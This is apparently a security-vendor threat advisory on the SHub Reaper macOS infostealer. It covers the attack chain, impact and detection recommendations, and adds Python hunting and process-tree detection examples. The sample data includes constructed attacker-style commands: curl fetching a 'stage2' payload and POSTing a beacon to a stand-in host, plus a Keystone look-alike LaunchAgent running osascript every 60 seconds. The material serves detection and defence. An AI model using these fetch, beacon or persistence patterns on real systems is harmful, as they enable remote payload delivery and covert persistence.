Threat Feed
high advisory

SHub Reaper Stealer Backdoors macOS with Multi-Brand Spoofing

The SHub Reaper stealer combines credential theft, wallet hijacking, and document exfiltration with persistent backdoor access on macOS, distributed through fake WeChat and Miro installers while spoofing Apple, Google, and Microsoft to evade detection.

The SHub Reaper stealer is a macOS infostealer that blends traditional stealer functionality with persistent backdoor capabilities. It is distributed through social engineering lures such as fake WeChat and Miro installers. The malware illustrates a shift in macOS tradecraft: instead of ClickFix-style lures that have the victim paste commands into Terminal, it relies on AppleScript-based execution, which sidesteps detections built around Terminal-spawned commands. SHub Reaper leverages a multi-brand spoofing technique, impersonating Apple, Google, and Microsoft at different stages of the infection chain. The malware installs a fake Google Update framework to maintain persistence and establishes a backdoor that allows arbitrary command execution and continuous compromise of the infected system. This represents an evolution in macOS infostealers, combining "smash-and-grab" data theft with long-term access and control.

Attack Chain

  1. The attack starts with malicious web pages offering fake Miro and WeChat installers.
  2. Victims download and execute the fake installers, initiating the infection chain.
  3. The malware may be hosted on a typosquatted Microsoft domain.
  4. The installer executes under the guise of a fake Apple security update.
  5. SHub Reaper installs a fake Google Update framework under the user Library paths for persistence.
  6. A LaunchAgent is registered using Google Keystone-style naming conventions to ensure the malware runs regularly.
  7. The malware beacons to a command and control server every 60 seconds, supporting arbitrary command execution.
  8. The malware steals credentials, hijacks crypto wallets, and exfiltrates documents while maintaining persistent backdoor access.
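
Steps 5 and 6 above describe persistence through a LaunchAgent that borrows Google Keystone naming and runs a fake Google Update framework from the user's Library. The following hunt script is an added example, not code from the advisory or from any vendor: it parses LaunchAgent plists and flags Keystone-style labels whose program lives outside the assumed genuine Keystone directory, runs an interpreter or downloader directly, or fires on a beaconing-like interval. The genuine Keystone path, the label names, and the two sample plists are assumptions constructed for the demonstration.

```python
"""Hunt the user's LaunchAgents for Google Keystone look-alike persistence.

Added example, not code from the advisory or its vendor. Assumptions are
marked below; the sample plists are constructed for the demonstration.
"""
import plistlib
import tempfile
from pathlib import Path

# Assumption: the genuine Keystone agent lives under this directory in ~/Library.
GENUINE_KEYSTONE_DIR = "Library/Google/GoogleSoftwareUpdate/"
# Interpreters and downloaders a genuine updater agent has no reason to run directly.
INTERPRETERS = {"osascript", "sh", "bash", "zsh", "curl", "python3"}


def assess_launch_agent(plist_bytes: bytes) -> list[str]:
    """Return reasons a LaunchAgent plist looks like Keystone-style masquerading (empty if clean)."""
    data = plistlib.loads(plist_bytes)
    label = str(data.get("Label", ""))
    if not label.lower().startswith("com.google.keystone"):
        return []  # only Keystone-style labels are in scope for this hunt
    args = data.get("ProgramArguments") or ([data["Program"]] if "Program" in data else [])
    program = args[0] if args else ""
    reasons = []
    if GENUINE_KEYSTONE_DIR not in program:
        reasons.append(f"Keystone label but program outside {GENUINE_KEYSTONE_DIR}: {program!r}")
    if Path(program).name in INTERPRETERS:
        reasons.append(f"Keystone label runs an interpreter or downloader: {program!r}")
    interval = data.get("StartInterval")
    if isinstance(interval, int) and interval <= 60:
        reasons.append(f"StartInterval of {interval}s matches a beaconing cadence")
    return reasons


def scan_launch_agents(directory: Path) -> dict[str, list[str]]:
    """Assess every *.plist in a LaunchAgents directory; unparseable files are reported too."""
    findings = {}
    for plist in sorted(directory.glob("*.plist")):
        try:
            reasons = assess_launch_agent(plist.read_bytes())
        except Exception as exc:  # a malformed plist is itself worth a look
            reasons = [f"unparseable plist: {exc}"]
        if reasons:
            findings[plist.name] = reasons
    return findings


# Constructed samples (not real artifacts): one genuine-looking agent, one look-alike.
LEGIT_AGENT = plistlib.dumps({
    "Label": "com.google.keystone.agent",
    "ProgramArguments": [
        "/Users/alice/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle"
        "/Contents/Helpers/GoogleSoftwareUpdateAgent.app/Contents/MacOS/GoogleSoftwareUpdateAgent",
        "-runMode", "ifneeded",
    ],
    "StartInterval": 3600,
})
FAKE_AGENT = plistlib.dumps({
    "Label": "com.google.keystone.system.agent",
    "ProgramArguments": [
        "/usr/bin/osascript",
        "/Users/alice/Library/Google/GoogleUpdate.framework/Versions/A/Resources/update.scpt",
    ],
    "StartInterval": 60,
    "RunAtLoad": True,
})


def run_demo() -> dict[str, list[str]]:
    """Write the samples to a temporary LaunchAgents directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        agents = Path(tmp)
        (agents / "com.google.keystone.agent.plist").write_bytes(LEGIT_AGENT)
        (agents / "com.google.keystone.system.agent.plist").write_bytes(FAKE_AGENT)
        return scan_launch_agents(agents)


if __name__ == "__main__":
    for name, reasons in run_demo().items():
        print(name)
        for reason in reasons:
            print("  -", reason)
```

On a live host, call scan_launch_agents(Path.home() / "Library/LaunchAgents"). The path check is a heuristic: a look-alike dropped under the genuine directory would only be caught by the interpreter or interval checks, so confirm any hit by verifying the program's code signature (codesign -dv) rather than trusting the path alone.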

Impact

Successful SHub Reaper infections can lead to significant data loss, including sensitive credentials, cryptocurrency assets, and confidential documents. The persistent backdoor allows attackers to maintain long-term access to compromised systems, enabling further data theft, command execution, and potential lateral movement within the network. Because execution moves from Terminal (the ClickFix pattern) to AppleScript, detections that key only on Terminal-spawned commands will not fire, increasing the likelihood that a compromise goes unnoticed. This combination of stealer and backdoor capabilities makes SHub Reaper a particularly dangerous threat to macOS users.

Recommendation

  • Monitor for unexpected invocations of Script Editor (Script Editor.app) to detect potential AppleScript-based execution, as outlined by SentinelOne’s report.
  • Deploy the Sigma rule detecting osascript spawning curl or shell interpreters to identify malicious AppleScript activity.
  • Implement the Sigma rule for detecting browser-to-AppleScript execution chains to identify potential initial access vectors.
  • Educate macOS users to be wary of software installers from untrusted sources and to verify the authenticity of software updates, as this is the primary infection vector.
  • Monitor user Library paths for the installation of unexpected Google Update frameworks and LaunchAgents with Google Keystone-style naming conventions, as these are indicators of persistence.
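
The first three recommendations describe two process-tree patterns: osascript spawning curl or a shell, and a browser leading to Script Editor or osascript. The following detector is an added example, not the platform's Sigma rules or any vendor's code: it runs both patterns over a constructed set of process-creation events (pid, ppid, name, cmdline) and returns the hits. The browser list, the process names, and every event are assumptions made up for the demonstration.

```python
"""Process-tree detections for AppleScript-based execution on macOS.

Added example, not the platform's Sigma rules. Events are constructed;
field names (pid, ppid, name, cmdline) are an assumed normalized schema.
"""

OSASCRIPT_CHILDREN = {"curl", "sh", "bash", "zsh"}
BROWSERS = {"Safari", "Google Chrome", "firefox", "Microsoft Edge", "Arc"}  # assumed names
SCRIPT_RUNNERS = {"osascript", "Script Editor"}


def ancestors(event, by_pid, max_depth=4):
    """Yield ancestor events nearest-first, stopping at an unknown pid or after max_depth."""
    cur = event
    for _ in range(max_depth):
        parent = by_pid.get(cur["ppid"])
        if parent is None:
            return
        yield parent
        cur = parent


def detect(events):
    """Return (rule, child_pid, matched_ancestor_pid) tuples for both patterns."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        # Rule 1: osascript directly spawning curl or a shell interpreter.
        parent = by_pid.get(e["ppid"])
        if parent and parent["name"] == "osascript" and e["name"] in OSASCRIPT_CHILDREN:
            hits.append(("osascript_spawns_curl_or_shell", e["pid"], parent["pid"]))
        # Rule 2: Script Editor or osascript with a browser anywhere in its recent ancestry.
        if e["name"] in SCRIPT_RUNNERS:
            for anc in ancestors(e, by_pid):
                if anc["name"] in BROWSERS:
                    hits.append(("browser_to_applescript_chain", e["pid"], anc["pid"]))
                    break
    return hits


# Constructed process-creation events: a browser-driven chain, a LaunchAgent-driven
# beacon, and a benign osascript run from a user shell.
SAMPLE_EVENTS = [
    {"pid": 1,   "ppid": 0,   "name": "launchd",       "cmdline": "/sbin/launchd"},
    {"pid": 100, "ppid": 1,   "name": "Safari",        "cmdline": "/Applications/Safari.app/Contents/MacOS/Safari"},
    {"pid": 200, "ppid": 100, "name": "Script Editor", "cmdline": "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor"},
    {"pid": 300, "ppid": 200, "name": "osascript",     "cmdline": "osascript -e 'do shell script ...'"},
    {"pid": 301, "ppid": 300, "name": "curl",          "cmdline": "curl -fsSL http://example.invalid/stage2"},
    {"pid": 302, "ppid": 300, "name": "sh",            "cmdline": "sh -c ..."},
    {"pid": 400, "ppid": 1,   "name": "osascript",     "cmdline": "osascript /Users/alice/Library/Google/GoogleUpdate.framework/Resources/update.scpt"},
    {"pid": 401, "ppid": 400, "name": "curl",          "cmdline": "curl -s -X POST http://example.invalid/beacon"},
    {"pid": 500, "ppid": 1,   "name": "Terminal",      "cmdline": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"},
    {"pid": 501, "ppid": 500, "name": "zsh",           "cmdline": "-zsh"},
    {"pid": 502, "ppid": 501, "name": "osascript",     "cmdline": "osascript -e 'display notification \"done\"'"},
]


if __name__ == "__main__":
    for rule, child, ancestor in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {child} (via pid {ancestor})")
```

Two caveats for production use. When a page invokes the applescript:// URL scheme, LaunchServices rather than the browser may launch Script Editor, so the parent seen by an EDR can be launchd; in that case correlate on a short time window between the browser's URL handling and the Script Editor launch instead of relying on ancestry alone. Rule 1 will also fire on legitimate automation that shells out from AppleScript, so tune it with an allowlist of known scripts rather than disabling it.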

Detection coverage (3 rules)

Detect osascript Spawning Curl or Shell Interpreters

high

Detects osascript (AppleScript interpreter) spawning curl or shell interpreters, indicative of malicious AppleScript execution.

Sigma | tactics: execution | techniques: T1059.004 | sources: process_creation, macos

Detect Browser to AppleScript Execution Chain

medium

Detects browser processes initiating AppleScript execution via the applescript:// URL scheme, potentially indicating malicious activity.

Sigma | tactics: execution, initial_access | techniques: T1218 | sources: process_creation, macos

Detect Suspicious Script Editor Usage

low

Detects unexpected use of Script Editor.app, which may indicate malicious AppleScript execution.

Sigma | tactics: execution | techniques: T1059.004 | sources: process_creation, macos
